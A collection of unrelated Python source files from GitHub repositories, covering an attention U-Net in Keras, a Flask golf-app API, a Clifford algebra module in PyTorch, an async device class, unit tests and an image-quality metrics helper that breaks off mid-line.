result = Conv2D(shape_x[3], (1, 1), padding='same', name='q_attn_conv' + name)(y)\n    if normalize_layer == 'bn':\n        result_bn = BatchNormalization(name='q_attn_bn' + name)(result)\n    elif normalize_layer == 'mvn':\n        result_bn = Lambda(mvn, name='q_attn_mvn' + name)(result)\n    else:\n        result_bn = result\n    return result_bn\n\n\ndef UnetConv2D(input, outdim, is_batchnorm, name, kinit = 'glorot_normal'):\n    x = Conv2D(outdim, (3, 3), strides=(1, 1), kernel_initializer=kinit, padding=\"same\", name=name + '_1')(input)\n    if is_batchnorm:\n        x = BatchNormalization(name=name + '_1_bn')(x)\n    x = Activation('relu', name=name + '_1_act')(x)\n\n    x = Conv2D(outdim, (3, 3), strides=(1, 1), kernel_initializer=kinit, padding=\"same\", name=name + '_2')(x)\n    if is_batchnorm:\n        x = BatchNormalization(name=name + '_2_bn')(x)\n    x = Activation('relu', name=name + '_2_act')(x)\n    return x\n\n\ndef UnetGatingSignal(input, name, normalize_layer = 'bn', act = 'relu'):\n    ''' this is simply 1x1 convolution, bn, activation '''\n    shape = K.int_shape(input)\n    x = Conv2D(shape[3], (1, 1), strides=(1, 1), padding=\"same\", name=name + '_conv')(input)\n    if normalize_layer == 'bn':\n        x = BatchNormalization(name=name + '_bn')(x)\n    elif normalize_layer == 'mvn':\n        x = Lambda(mvn, name=name + '_mvn')(x)\n    x = Activation(act, name=name + '_act')(x)\n    return x\n\ndef UnetGatingSignal_t2(input, name, nb_filter, normalize_layer = 'bn', act = 'relu'):\n    ''' this is simply 1x1 convolution, bn, activation '''\n    x = Conv2D(nb_filter, (1, 1), strides=(1, 1), padding=\"same\", name=name + '_conv')(input)\n    if normalize_layer == 'bn':\n        x = BatchNormalization(name=name + '_bn')(x)\n    elif normalize_layer == 'mvn':\n        x = Lambda(mvn, name=name + '_mvn')(x)\n    x = Activation(act, name=name + '_act')(x)\n    return x\n\n##############################################################################################\n#Att_unet_t3 additional functions\ndef attention_block_2d(x, g, inter_channel):\n    theta_x = Conv2D(inter_channel, [1, 1], strides=[1, 1])(x)\n    phi_g = Conv2D(inter_channel, [1, 1], strides=[1, 1])(g)\n    f = Activation('relu')(add([theta_x, phi_g]))\n    psi_f = Conv2D(1, [1, 1], strides=[1, 1])(f)\n    rate = Activation('sigmoid')(psi_f)\n    att_x = multiply([x, rate])\n    return att_x\n\n\ndef attention_up_and_concate(down_layer, layer,inter_ratio = 0.25, opt_skip=concatenate):\n    # in_channel = down_layer.get_shape().as_list()[3]\n    in_channel = down_layer._keras_shape[-1]\n    # up = Conv2DTranspose(out_channel, [2, 2], strides=[2, 2])(down_layer)\n    up = UpSampling2D(size=(2, 2))(down_layer)\n    layer = attention_block_2d(x=layer, g=up, inter_channel=int(in_channel*inter_ratio))\n    # my_concat = Lambda(lambda x: K.concatenate([x[0], x[1]], axis=3))\n    # concate = my_concat([up, layer])\n    concate = opt_skip([up, layer])\n    return concate\n\ndef attention_up_and_concate_t2(down_layer, layer,inter_ratio = 0.25, opt_skip=concatenate):\n    # in_channel = down_layer.get_shape().as_list()[3]\n    in_channel = down_layer._keras_shape[-1]\n    # up = Conv2DTranspose(out_channel, [2, 2], strides=[2, 2])(down_layer)\n    up = UpSampling2D(size=(2, 2))(down_layer)\n    layer = attention_block_2d(x=layer, g=up, inter_channel=int(in_channel*inter_ratio))\n    # my_concat = Lambda(lambda x: K.concatenate([x[0], x[1]], axis=3))\n    # concate = my_concat([up, layer])\n    concate = opt_skip([Conv2DTranspose(in_channel, [2,2], strides=[2,2], padding='same')(down_layer), layer])\n    return concate
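\n\n# Usage sketch (hypothetical tensor names, assuming a U-Net-style decoder):\n#   gate = UnetGatingSignal(bottom, name='g_1')\n#   attn = AttnGatingBlock(skip, gate, inter_shape=128, name='_1')\n#   x = concatenate([UpSampling2D(size=(2, 2))(bottom), attn])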
concate","repo_name":"tswizzle141/FCN-Based-Method-for-Left-Ventricle-Endocardium-and-Epicardium-Segmentation-with-New-Block-Modules","sub_path":"addition_layers.py","file_name":"addition_layers.py","file_ext":"py","file_size_in_byte":10235,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"25010270507","text":"from flask import jsonify, request\nfrom flask_classful import FlaskView, route\nfrom golfrica_app import db\nfrom golfrica_app.Factories.BLFactory import BL\nfrom golfrica_app.Factories.ModelFactory import MF\nfrom golfrica_app.Globals.JSONResponses import AuthorizeRequest, notLoggedIn, dataSavedResponse, \\\n dataNotSavedResponse, get_decoded\n\n\nclass Swap(FlaskView):\n response = dict({\"isLoggedIn\": True})\n\n def index(self):\n print(request.headers)\n user = AuthorizeRequest(request.headers)\n if not user:\n return jsonify(notLoggedIn)\n\n swaps = BL.getBL(\"swap\").getSwaps(user)\n return jsonify(swaps)\n\n def get(self, id):\n user = AuthorizeRequest(request.headers)\n if not user:\n return jsonify(notLoggedIn)\n\n self.response.update({\"country\": BL.getBL(\"swap\").getCountryById(id)})\n return jsonify(self.response)\n\n @route(\"/status//\")\n def swap_status(self, status_id):\n user = AuthorizeRequest(request.headers)\n if not user:\n return jsonify(notLoggedIn)\n isFound, status = BL.getBL(\"status\").getStatusByIdObject(status_id)\n print(status.status_id)\n\n if not isFound:\n self.response.update({\n \"isSwaped\": False,\n 'message': 'Status not found.',\n 'msg_type': 'error'\n })\n\n isSwaped, message, msg_type = BL.getBL(\"swap\").swapStatus(user, status)\n self.response.update({\n \"isSwaped\": isSwaped,\n 'message': message,\n 'msg_type': msg_type\n })\n return jsonify(self.response)\n\n @route(\"/swap_status///\")\n def swap_status_with_user(self, status_id, user_id):\n user = AuthorizeRequest(request.headers)\n if not user:\n return jsonify(notLoggedIn)\n\n isFound, status = BL.getBL(\"status\").getStatusByIdObject(status_id)\n isUserFound, swap_with = BL.getBL(\"user\").getUserObjectById(user_id)\n\n if not isFound or not isUserFound:\n self.response.update({\n \"isSwaped\": False,\n 'message': 'Status not found.',\n 'msg_type': 'error'\n })\n\n isSwaped, message, msg_type = BL.getBL(\"swap\").swapStatus(user, status, swap_with)\n self.response.update({\n \"isSwaped\": isSwaped,\n 'message': message,\n 'msg_type': msg_type\n })\n return jsonify(self.response)\n\n @route(\"/unswap_status///\")\n def unswap_status_with_user(self, status_id, user_id):\n user = AuthorizeRequest(request.headers)\n if not user:\n return jsonify(notLoggedIn)\n\n model = MF.getModel(\"swap\")\n swap = model.query.filter_by(status_id=status_id,swaper_id=user.user_id, swaped_with_id=user_id)\n if not swap.count() > 0:\n self.response.update({\n \"isUnSwaped\": False,\n 'message': \"No such swap found\",\n })\n\n swap = swap.first()\n try:\n db.session.delete(swap)\n db.session.commit()\n self.response.update({\n \"isUnSwaped\": True,\n 'message': \"Unswaped\",\n })\n except Exception as e:\n print(e)\n self.response.update({\n \"isUnSwaped\": False,\n 'message': \"Error occurred, Please try again.\",\n })\n return jsonify(self.response)\n\n @route(\"/comment_status/\", methods=['post'])\n def commentStatus(self):\n user = AuthorizeRequest(request.headers)\n if not user:\n return jsonify(notLoggedIn)\n print(request.form['data'])\n data = get_decoded(request.form['data'])\n print(data)\n if not data:\n 
self.response.update({\n \"isCommented\": False,\n \"messageOrComment\": 'Invalid data provided.',\n \"msg_type\": 'error'\n })\n return jsonify(self.response)\n\n isFound, status = BL.getBL(\"status\").getStatusByIdObject(data['status_id'])\n if isFound:\n isCommented, messageOrComment, msg_type = BL.getBL(\"swap\").commentStatus(user, status, data['comment'],\n data['rating'])\n self.response.update({\n \"isCommented\": isCommented,\n \"messageOrComment\": messageOrComment,\n \"msg_type\": msg_type\n })\n return jsonify(self.response)\n self.response.update({\n \"isCommented\": False,\n \"messageOrComment\": 'No such status found',\n \"msg_type\": 'error'\n })\n return jsonify(self.response)\n\n def put(self):\n pass\n\n def post(self):\n user = AuthorizeRequest(request.headers)\n if not user:\n return jsonify(notLoggedIn)\n\n form = request.form\n isUpdated, countryOrException = BL.getBL(\"swap\").addCountry(form)\n if isUpdated:\n dataSavedResponse.update({\"country\": countryOrException})\n return jsonify(dataSavedResponse)\n dataNotSavedResponse.update({\"message\": countryOrException})\n return jsonify(dataNotSavedResponse)\n\n def delete(self, id):\n pass\n\n def notifications(self):\n user = AuthorizeRequest(request.headers)\n if not user:\n return jsonify(notLoggedIn)\n\n isSwapNotificationsFound, swaps = BL.getBL(\"swap\").getSwapNotifications(user)\n self.response.update({\"isSwapNotificationsFound\": isSwapNotificationsFound, \"swaps\": swaps})\n return jsonify(self.response)\n\n def approve(self, id):\n user = AuthorizeRequest(request.headers)\n if not user:\n return jsonify(notLoggedIn)\n\n swap = BL.getBL(\"swap\").getSwapObjectById(id)\n if not swap:\n self.response.update({\"isSwapApproved\": False, \"message\": 'Swap not found.', 'msg_type': 'error'})\n return jsonify(self.response)\n\n isSwapApproved, message, msg_type = BL.getBL(\"swap\").approveSwap(user, swap)\n self.response.update({\"isSwapApproved\": isSwapApproved, \"message\": message, 'msg_type': msg_type})\n return jsonify(self.response)\n\n def decline(self, id):\n user = AuthorizeRequest(request.headers)\n if not user:\n return jsonify(notLoggedIn)\n\n swap = BL.getBL(\"swap\").getSwapObjectById(id)\n if not swap:\n self.response.update({\"isSwapDeclined\": False, \"message\": 'Swap not found.', 'msg_type': 'error'})\n return jsonify(self.response)\n\n isSwapDeclined, message, msg_type = BL.getBL(\"swap\").declineSwap(user, swap)\n self.response.update({\"isSwapDeclined\": isSwapDeclined, \"message\": message, 'msg_type': msg_type})\n return jsonify(self.response)\n","repo_name":"theirfanirfi/golfapp-apis","sub_path":"golfrica_app/Views/Statuses/Swap.py","file_name":"Swap.py","file_ext":"py","file_size_in_byte":6950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9225393541","text":"import functools\nimport math\n\nimport torch\nfrom torch import nn\n\nfrom .metric import ShortLexBasisBladeOrder, construct_gmt, gmt_element\n\n\nclass CliffordAlgebra(nn.Module):\n def __init__(self, metric):\n super().__init__()\n\n self.register_buffer(\"metric\", torch.as_tensor(metric))\n self.num_bases = len(metric)\n self.bbo = ShortLexBasisBladeOrder(self.num_bases)\n self.dim = len(self.metric)\n self.n_blades = len(self.bbo.grades)\n cayley = (\n construct_gmt(\n self.bbo.index_to_bitmap, self.bbo.bitmap_to_index, self.metric\n )\n .to_dense()\n .to(torch.get_default_dtype())\n )\n self.grades = self.bbo.grades.unique()\n self.register_buffer(\n 
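# per-grade subspace dimensions: C(dim, g) basis blades for each grade g\n            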
\"subspaces\",\n torch.tensor(tuple(math.comb(self.dim, g) for g in self.grades)),\n )\n self.n_subspaces = len(self.grades)\n self.grade_to_slice = self._grade_to_slice(self.subspaces)\n self.grade_to_index = [\n torch.tensor(range(*s.indices(s.stop))) for s in self.grade_to_slice\n ]\n\n self.register_buffer(\n \"bbo_grades\", self.bbo.grades.to(torch.get_default_dtype())\n )\n self.register_buffer(\"even_grades\", self.bbo_grades % 2 == 0)\n self.register_buffer(\"odd_grades\", ~self.even_grades)\n self.register_buffer(\"cayley\", cayley)\n\n def geometric_product(self, a, b, blades=None):\n cayley = self.cayley\n\n if blades is not None:\n blades_l, blades_o, blades_r = blades\n assert isinstance(blades_l, torch.Tensor)\n assert isinstance(blades_o, torch.Tensor)\n assert isinstance(blades_r, torch.Tensor)\n cayley = cayley[blades_l[:, None, None], blades_o[:, None], blades_r]\n\n return torch.einsum(\"...i,ijk,...k->...j\", a, cayley, b)\n\n def _grade_to_slice(self, subspaces):\n grade_to_slice = list()\n subspaces = torch.as_tensor(subspaces)\n for grade in self.grades:\n index_start = subspaces[:grade].sum()\n index_end = index_start + math.comb(self.dim, grade)\n grade_to_slice.append(slice(index_start, index_end))\n return grade_to_slice\n\n @functools.cached_property\n def _alpha_signs(self):\n return torch.pow(-1, self.bbo_grades)\n\n @functools.cached_property\n def _beta_signs(self):\n return torch.pow(-1, self.bbo_grades * (self.bbo_grades - 1) // 2)\n\n @functools.cached_property\n def _gamma_signs(self):\n return torch.pow(-1, self.bbo_grades * (self.bbo_grades + 1) // 2)\n\n def alpha(self, mv, blades=None):\n signs = self._alpha_signs\n if blades is not None:\n signs = signs[blades]\n return signs * mv.clone()\n\n def beta(self, mv, blades=None):\n signs = self._beta_signs\n if blades is not None:\n signs = signs[blades]\n return signs * mv.clone()\n\n def gamma(self, mv, blades=None):\n signs = self._gamma_signs\n if blades is not None:\n signs = signs[blades]\n return signs * mv.clone()\n\n def zeta(self, mv):\n return mv[..., :1]\n\n def embed(self, tensor: torch.Tensor, tensor_index: torch.Tensor) -> torch.Tensor:\n mv = torch.zeros(\n *tensor.shape[:-1], 2**self.dim, device=tensor.device, dtype=tensor.dtype\n )\n mv[..., tensor_index] = tensor\n return mv\n\n def embed_grade(self, tensor: torch.Tensor, grade: int) -> torch.Tensor:\n mv = torch.zeros(*tensor.shape[:-1], 2**self.dim, device=tensor.device)\n s = self.grade_to_slice[grade]\n mv[..., s] = tensor\n return mv\n\n def get(self, mv: torch.Tensor, blade_index: tuple[int]) -> torch.Tensor:\n blade_index = tuple(blade_index)\n return mv[..., blade_index]\n\n def get_grade(self, mv: torch.Tensor, grade: int) -> torch.Tensor:\n s = self.grade_to_slice[grade]\n return mv[..., s]\n\n def b(self, x, y, blades=None):\n if blades is not None:\n assert len(blades) == 2\n beta_blades = blades[0]\n blades = (\n blades[0],\n torch.tensor([0]),\n blades[1],\n )\n else:\n blades = torch.tensor(range(self.n_blades))\n blades = (\n blades,\n torch.tensor([0]),\n blades,\n )\n beta_blades = None\n\n return self.geometric_product(\n self.beta(x, blades=beta_blades),\n y,\n blades=blades,\n )\n\n def q(self, mv, blades=None):\n if blades is not None:\n blades = (blades, blades)\n return self.b(mv, mv, blades=blades)\n\n def _smooth_abs_sqrt(self, input, eps=1e-16):\n return (input**2 + eps) ** 0.25\n\n def norm(self, mv, blades=None):\n return self._smooth_abs_sqrt(self.q(mv, blades=blades))\n\n def norms(self, mv, 
grades=None):\n if grades is None:\n grades = self.grades\n return [\n self.norm(self.get_grade(mv, grade), blades=self.grade_to_index[grade])\n for grade in grades\n ]\n\n def qs(self, mv, grades=None):\n if grades is None:\n grades = self.grades\n return [\n self.q(self.get_grade(mv, grade), blades=self.grade_to_index[grade])\n for grade in grades\n ]\n\n def sandwich(self, u, v, w):\n return self.geometric_product(self.geometric_product(u, v), w)\n\n def output_blades(self, blades_left, blades_right):\n blades = []\n for blade_left in blades_left:\n for blade_right in blades_right:\n bitmap_left = self.bbo.index_to_bitmap[blade_left]\n bitmap_right = self.bbo.index_to_bitmap[blade_right]\n bitmap_out, _ = gmt_element(bitmap_left, bitmap_right, self.metric)\n index_out = self.bbo.bitmap_to_index[bitmap_out]\n blades.append(index_out)\n\n return torch.tensor(blades)\n\n def random(self, n=None):\n if n is None:\n n = 1\n return torch.randn(n, self.n_blades)\n\n def random_vector(self, n=None):\n if n is None:\n n = 1\n vector_indices = self.bbo_grades == 1\n v = torch.zeros(n, self.n_blades, device=self.cayley.device)\n v[:, vector_indices] = torch.randn(\n n, vector_indices.sum(), device=self.cayley.device\n )\n return v\n\n def parity(self, mv):\n is_odd = torch.all(mv[..., self.even_grades] == 0)\n is_even = torch.all(mv[..., self.odd_grades] == 0)\n\n if is_odd ^ is_even: # exclusive or (xor)\n return is_odd\n else:\n raise ValueError(\"This is not a homogeneous element.\")\n\n def eta(self, w):\n return (-1) ** self.parity(w)\n\n def alpha_w(self, w, mv):\n return self.even_grades * mv + self.eta(w) * self.odd_grades * mv\n\n def inverse(self, mv, blades=None):\n mv_ = self.beta(mv, blades=blades)\n return mv_ / self.q(mv)\n\n def rho(self, w, mv):\n \"\"\"Applies the versor w action to mv.\"\"\"\n return self.sandwich(w, self.alpha_w(w, mv), self.inverse(w))\n\n def reduce_geometric_product(self, inputs):\n return functools.reduce(self.geometric_product, inputs)\n\n def versor(self, order=None, normalized=True):\n if order is None:\n order = self.dim if self.dim % 2 == 0 else self.dim - 1\n vectors = self.random_vector(order)\n versor = self.reduce_geometric_product(vectors[:, None])\n if normalized:\n versor = versor / self.norm(versor)[..., :1]\n return versor\n\n def rotor(self):\n return self.versor()\n\n @functools.cached_property\n def geometric_product_paths(self):\n gp_paths = torch.zeros((self.dim + 1, self.dim + 1, self.dim + 1), dtype=bool)\n\n for i in range(self.dim + 1):\n for j in range(self.dim + 1):\n for k in range(self.dim + 1):\n s_i = self.grade_to_slice[i]\n s_j = self.grade_to_slice[j]\n s_k = self.grade_to_slice[k]\n\n m = self.cayley[s_i, s_j, s_k]\n gp_paths[i, j, k] = (m != 0).any()\n\n return gp_paths\n","repo_name":"DavidRuhe/clifford-group-equivariant-neural-networks","sub_path":"algebra/cliffordalgebra.py","file_name":"cliffordalgebra.py","file_ext":"py","file_size_in_byte":8325,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"37"} +{"seq_id":"36220625016","text":"import asyncio\nfrom enum import Enum\nimport time\n\nclass DeviceException(Exception):\n\tpass\n\nclass DeviceStatus(Enum):\n\tSTOPPED = 0\n\tSTARTING = 1\n\tRUNNING = 2\n\tSTOPPING = 3\n\nclass Device:\n\tdef __init__(self, **kwargs):\n\t\tself.interval = kwargs.get(\"interval\", 0.010)\n\t\tself._lock = asyncio.Lock()\n\t\tself._status = DeviceStatus.STOPPED\n\t\tself._meas = None\n\t\n\tasync def run(self):\n\t\tawait 
self.set_status(DeviceStatus.STARTING)\n\t\tif await self.init():\n\t\t\tawait self.set_status(DeviceStatus.RUNNING)\n\t\t\twhile await self.status() == DeviceStatus.RUNNING:\n\t\t\t\tt = time.time()\n\t\t\t\tif not await self.cycle():\n\t\t\t\t\tbreak\n\t\t\t\tdelay = self.interval - (time.time() - t)\n\t\t\t\tif delay > 0:\n\t\t\t\t\tawait asyncio.sleep(delay)\n\t\t\tawait self.set_status(DeviceStatus.STOPPING)\n\t\t\tawait self.close()\n\t\tawait self.set_status(DeviceStatus.STOPPED)\n\t\n\tasync def status(self):\n\t\tasync with self._lock:\n\t\t\treturn self._status\n\t\n\tasync def set_status(self, status):\n\t\tasync with self._lock:\n\t\t\tself._status = status\n\t\n\tasync def stop(self):\n\t\tawait self.set_status(DeviceStatus.STOPPING)\n\t\n\tasync def init(self):\n\t\treturn True\n\t\n\tasync def close(self):\n\t\tpass\n\t\n\tasync def cycle(self):\n\t\treturn True\n\t\n\tasync def read(self):\n\t\tasync with self._lock:\n\t\t\treturn self._meas\n","repo_name":"molkoback/measmisc","sub_path":"measmisc/device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29433765619","text":"# -*- coding: utf-8 -*-\n\nfrom unittest import TestCase\nfrom unittest.mock import MagicMock\nfrom unittest.mock import patch\n\nfrom flask_babel import Locale\n\nfrom app import create_app\nfrom app import db\nfrom app.configuration import TestConfiguration\nfrom app.localization import get_default_language\nfrom app.localization import get_language_names\nfrom app.localization import get_languages\nfrom app.localization import get_locale\nfrom app.userprofile import User\n\n\nclass LanguagesTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Initialize the test cases.\n \"\"\"\n\n self.app = create_app(TestConfiguration)\n self.app_context = self.app.app_context()\n self.app_context.push()\n self.request_context = self.app.test_request_context()\n self.request_context.push()\n db.create_all()\n\n self.default_language = 'en'\n self.path = 'mock/test'\n self.listdir_return_value = [\n 'de',\n 'en-US',\n 'not-a-language',\n '12-34',\n 'DE',\n 'DE-de',\n 'de-',\n 'de--',\n 'de--DE',\n 'de-DEE',\n 'de-AT-CH',\n '-DE',\n '-',\n '',\n ]\n\n def tearDown(self):\n \"\"\"\n Reset the test cases.\n \"\"\"\n\n db.session.remove()\n db.drop_all()\n self.request_context.pop()\n self.app_context.pop()\n\n def test_get_default_language(self):\n \"\"\"\n Test getting the default language.\n\n Expected result: 'en' is always returned.\n \"\"\"\n\n self.assertEqual(self.default_language, get_default_language())\n\n @patch('app.localization.languages.listdir')\n def test_get_language_names_with_native_names_english(self, mock_listdir: MagicMock):\n \"\"\"\n Test getting the list of language names with their native names (with 'en' as locale).\n\n Expected result: The list is returned and sorted by their name.\n \"\"\"\n\n mock_listdir.return_value = [\n 'es',\n 'fr',\n 'de',\n ]\n expected_names = [\n ('en', 'English'),\n ('fr', 'French (français)'),\n ('de', 'German (Deutsch)'),\n ('es', 'Spanish (español)'),\n ]\n\n names = get_language_names(TestConfiguration.TRANSLATION_DIR)\n mock_listdir.assert_called()\n self.assertListEqual(expected_names, list(names))\n\n @patch('app.localization.languages.get_current_locale')\n @patch('app.localization.languages.listdir')\n def test_get_language_names_with_native_names_german(self, mock_listdir: MagicMock,\n mock_get_current_locale: MagicMock):\n 
\"\"\"\n Test getting the list of language names with their native names (with 'de' as locale).\n\n Expected result: The list is returned and sorted by their name.\n \"\"\"\n\n mock_get_current_locale.return_value = Locale('de')\n mock_listdir.return_value = [\n 'es',\n 'fr',\n 'de',\n ]\n expected_names = [\n ('de', 'Deutsch'),\n ('en', 'Englisch (English)'),\n ('fr', 'Französisch (français)'),\n ('es', 'Spanisch (español)'),\n ]\n\n names = get_language_names(TestConfiguration.TRANSLATION_DIR)\n mock_listdir.assert_called()\n self.assertListEqual(expected_names, list(names))\n\n @patch('app.localization.languages.listdir')\n def test_get_language_names_without_native_names(self, mock_listdir: MagicMock):\n \"\"\"\n Test getting the list of language names without their native names.\n\n Expected result: The list is returned and sorted by their name.\n \"\"\"\n\n mock_listdir.return_value = [\n 'es',\n 'fr',\n 'de',\n ]\n expected_names = [\n ('en', 'English'),\n ('fr', 'French'),\n ('de', 'German'),\n ('es', 'Spanish'),\n ]\n\n names = get_language_names(TestConfiguration.TRANSLATION_DIR, with_native_names=False)\n mock_listdir.assert_called()\n self.assertListEqual(expected_names, list(names))\n\n @patch('app.localization.languages.listdir')\n def test_get_languages_default(self, mock_listdir: MagicMock):\n \"\"\"\n Run the `get_languages()` function with the default language.\n\n Expected result: A list containing the default `'en'` plus the valid languages from `listdir()`.\n \"\"\"\n\n mock_listdir.return_value = self.listdir_return_value\n\n languages = get_languages(self.path)\n\n mock_listdir.assert_called_with(self.path)\n self.assertListEqual([self.default_language, 'de', 'en-US'], list(languages))\n\n @patch('app.localization.languages.listdir')\n def test_get_languages_non_default(self, mock_listdir: MagicMock):\n \"\"\"\n Run the `get_languages()` function with a non-default language.\n\n Expected result: A list containing the non-default language plus the valid languages from `listdir()`.\n \"\"\"\n\n mock_listdir.return_value = self.listdir_return_value\n\n languages = get_languages(self.path, 'fr')\n\n mock_listdir.assert_called_with(self.path)\n self.assertListEqual(['fr', 'de', 'en-US'], list(languages))\n\n @patch('app.localization.languages.listdir')\n def test_get_languages_nonexistent_path(self, mock_listdir: MagicMock):\n \"\"\"\n Run the get_languages() function with a non-existent path (and default language).\n\n Expected result: A list simply containing the default language, no errors.\n \"\"\"\n\n mock_listdir.side_effect = OSError\n\n languages = get_languages(self.path)\n\n self.assertListEqual([self.default_language], list(languages))\n\n @patch('app.localization.languages.request')\n def test_get_locale_from_user(self, mock_request: MagicMock):\n \"\"\"\n Test getting the locale from a user who is logged in.\n\n Expected result: The user's preferred language is returned.\n \"\"\"\n\n # Mock the best_match() function to ensure it is not called.\n mock_request.accept_languages = MagicMock()\n mock_request.accept_languages.best_match = MagicMock(return_value='de')\n\n email = 'test@example.com'\n name = 'Jane Doe'\n password = '123456'\n user = User(email, name)\n user.set_password(password)\n db.session.add(user)\n db.session.commit()\n\n user.login(email, password)\n\n user.settings._language = 'fr'\n language = get_locale()\n self.assertEqual(user.settings._language, language)\n mock_request.accept_languages.best_match.assert_not_called()\n\n 
@patch('app.localization.languages.request')\n    def test_get_locale_from_request(self, mock_request: MagicMock):\n        \"\"\"\n        Test getting the locale if a user is not logged in.\n\n        Expected result: 'de'.\n        \"\"\"\n\n        mock_request.accept_languages = MagicMock()\n        mock_request.accept_languages.best_match = MagicMock(return_value='de')\n\n        language = get_locale()\n        self.assertEqual('de', language)\n","repo_name":"BMeu/Aerarium","sub_path":"tests/localization/languages_test.py","file_name":"languages_test.py","file_ext":"py","file_size_in_byte":7300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18353550867","text":"import sys\nfrom heapq import heappush, heappop\nsys.setrecursionlimit(10 ** 5)\ninput = sys.stdin.readline\n\nn,m = map(int,input().split())\ngraph = [[] for _ in range(n+1)]\n\nfor _ in range(m):\n    a,b,c = map(int,input().split())\n    graph[a].append((c,b))\n    graph[b].append((c,a))\n\n\ndist = [1e10 for _ in range(n+1)]\n\npq = []\nheappush(pq,(0,1))\ndist[1] = 0\n\n_m = {}\n\nwhile pq:\n    here_dist, here = heappop(pq)\n    if dist[here] != here_dist: continue\n    for there_dist, there in graph[here]:\n        if dist[there] > dist[here] + there_dist:\n            _m[there] = here\n            dist[there] = dist[here] + there_dist\n            heappush(pq,(dist[there], there))\nprint(len(_m))\nfor e in _m:\n    print(f\"{_m[e]} {e}\")","repo_name":"tommy16102/2022-algorithm-study","sub_path":"2023/May/week4/이정욱/2211_네트워크복구.py","file_name":"2211_네트워크복구.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"6137539852","text":"import pytest\nimport requests\n\nfrom waves import get_unique_waves_packs\n\nwaves_mock = [\n    {\"id\": \"1\", \"pack_id\": 1},\n    {\"id\": \"2\", \"pack_id\": 2},\n    {\"id\": \"3\", \"pack_id\": 2},\n    {\"id\": \"3\", \"pack_id\": 1},\n]\n\n\ndef waves_oms_mock_response(status_code=200, data=waves_mock):\n    response = requests.Response()\n    response.status_code = status_code\n    response.json = lambda: data\n\n    return response\n\n\ndef test_get_oms_waves(mocker):\n    requests_get_mock = mocker.patch(\"requests.get\")\n    requests_get_mock.side_effect = [\n        waves_oms_mock_response(),\n        waves_oms_mock_response(data=[{\"id\": \"3\", \"pack_id\": 4}]),\n    ]\n\n    response = get_unique_waves_packs(number_of_requests=2)\n\n    requests_get_mock.assert_has_calls(\n        [\n            mocker.call(\"https://6082d3aa5dbd2c001757a988.mockapi.io/oms/waves/1\"),\n            mocker.call(\"https://6082d3aa5dbd2c001757a988.mockapi.io/oms/waves/2\"),\n        ]\n    )\n    # also verify the exact number of requests made\n    assert requests_get_mock.call_count == 2\n\n    assert response == {1, 2, 4}\n\n\ndef test_get_oms_waves_raises(mocker):\n    requests_get_mock = mocker.patch(\"requests.get\")\n    requests_get_mock.return_value = waves_oms_mock_response(\n        status_code=400, data={\"message\": \"Api error.\"}\n    )\n\n    with pytest.raises(requests.exceptions.HTTPError):\n        response = get_unique_waves_packs()\n\n    requests_get_mock.assert_called_once_with(\n        \"https://6082d3aa5dbd2c001757a988.mockapi.io/oms/waves/1\"\n    )\n","repo_name":"rodolfolottin/pytest-mock-vs-responses","sub_path":"test_waves_pytest_mock.py","file_name":"test_waves_pytest_mock.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30819564851","text":"import lpips\nimport skimage\nimport torch\nfrom torchvision import transforms\n\n\n
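# Note: the helpers below accept HWC numpy arrays or CHW torch tensors; both images must\n# share the same shape, and LPIPS is evaluated on the torch device passed in by the caller.\n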
def calculate_metrics(original_img, upscaled_img, device):\n    \"\"\"\n    Given an original high resolution image and an upscaled\n    one, it calculates several metrics to assess the performance\n    of an upscaling model\n\n    Args:\n        - original_img (np.ndarray): original high resolution image\n        - upscaled_img (np.ndarray): upscaled image\n\n    Returns:\n        - lpips (float): LPIPS (Learned Perceptual Image Patch Similarity) metric\n        - ssim (float): SSIM (structural similarity index measure) metric\n        - psnr (float): PSNR (peak signal-to-noise ratio) metric\n    \"\"\"\n    lpips = calculate_lpips_distance(original_img, upscaled_img, device)\n\n    if torch.is_tensor(original_img):\n        original_img = original_img.permute(1,2,0).detach().cpu().numpy()\n\n\n    if torch.is_tensor(upscaled_img):\n        upscaled_img = upscaled_img.permute(1,2,0).detach().cpu().numpy()\n\n\n    ssim = skimage.metrics.structural_similarity(original_img, upscaled_img, channel_axis=2)\n    psnr = skimage.metrics.peak_signal_noise_ratio(original_img, upscaled_img)\n\n    return lpips, ssim, psnr\n\n\ndef calculate_lpips_distance(img1, img2, device):\n    \"\"\"\n    Calculates LPIPS distance (also called perceptual loss).\n    Reference: \"The Unreasonable Effectiveness of Deep Features as a Perceptual Metric\"\n    Richard Zhang, Phillip Isola, Alexei A. Efros, Eli Shechtman, Oliver Wang. In CVPR, 2018.\n\n    Args:\n        - img1 (np.ndarray): first image to compare\n        - img2 (np.ndarray): second image to compare\n\n    Returns:\n        - lpips_distance (float): LPIPS distance\n    \"\"\"\n    img_shape = img1.shape\n\n    if not torch.is_tensor(img1):\n        img1 = torch.tensor(img1).permute(2,0,1).float()\n\n    if not torch.is_tensor(img2):\n        img2 = torch.tensor(img2).permute(2,0,1).float()\n\n    mean1, std1 = img1.mean([1,2]), img1.std([1,2])\n    mean2, std2 = img2.mean([1,2]), img2.std([1,2])\n\n    # define custom transform\n    # here we are using our calculated\n    # mean & std\n    transform1 = transforms.Compose([\n        #transforms.ToTensor(),\n        transforms.Normalize(mean1, std1)\n        #transforms.Normalize()\n    ])\n\n    transform2 = transforms.Compose([\n        #transforms.ToTensor(),\n        transforms.Normalize(mean2, std2)\n        #transforms.Normalize()\n    ])\n\n    img1 = transform1(img1)\n    img2 = transform2(img2)\n\n    loss_fn = lpips.LPIPS(net='alex').to(device)  # best forward scores\n    #loss_fn = lpips.LPIPS(net='vgg') # closer to \"traditional\" perceptual loss, when used for optimization\n\n    img1 = img1.to(device)\n    img2 = 